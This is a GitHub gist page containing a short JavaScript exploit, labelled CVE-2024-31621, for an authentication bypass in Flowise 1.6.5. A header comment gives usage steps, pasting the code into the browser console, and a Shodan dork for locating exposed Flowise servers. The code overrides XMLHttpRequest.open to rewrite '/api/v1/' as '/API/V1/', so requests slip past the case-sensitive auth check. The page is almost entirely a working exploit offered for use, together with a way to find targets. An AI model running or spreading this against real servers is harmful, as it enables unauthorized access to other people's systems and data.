Created
May 8, 2024 18:18
-
-
Save komodoooo/3666c2a3dc8db566d439f7a936c90ea7 to your computer and use it in GitHub Desktop.
CVE-2024-31621 exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* CVE-2024-31621 | |
| Flowise 1.6.5 <= Authentication Bypass | |
| By komodo | |
| Usage: Navigate to a page that does not require auth (ex: /tools), | |
| then inject this code inside dev tools console. | |
| Shodan dork: http.favicon.hash:-2051052918 | |
| */ | |
| var req = XMLHttpRequest.prototype.open; | |
| XMLHttpRequest.prototype.open = function(method, url) { | |
| arguments[1] = url.replace('/api/v1/','/API/V1/'); | |
| return req.apply(this, arguments); | |
| }; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment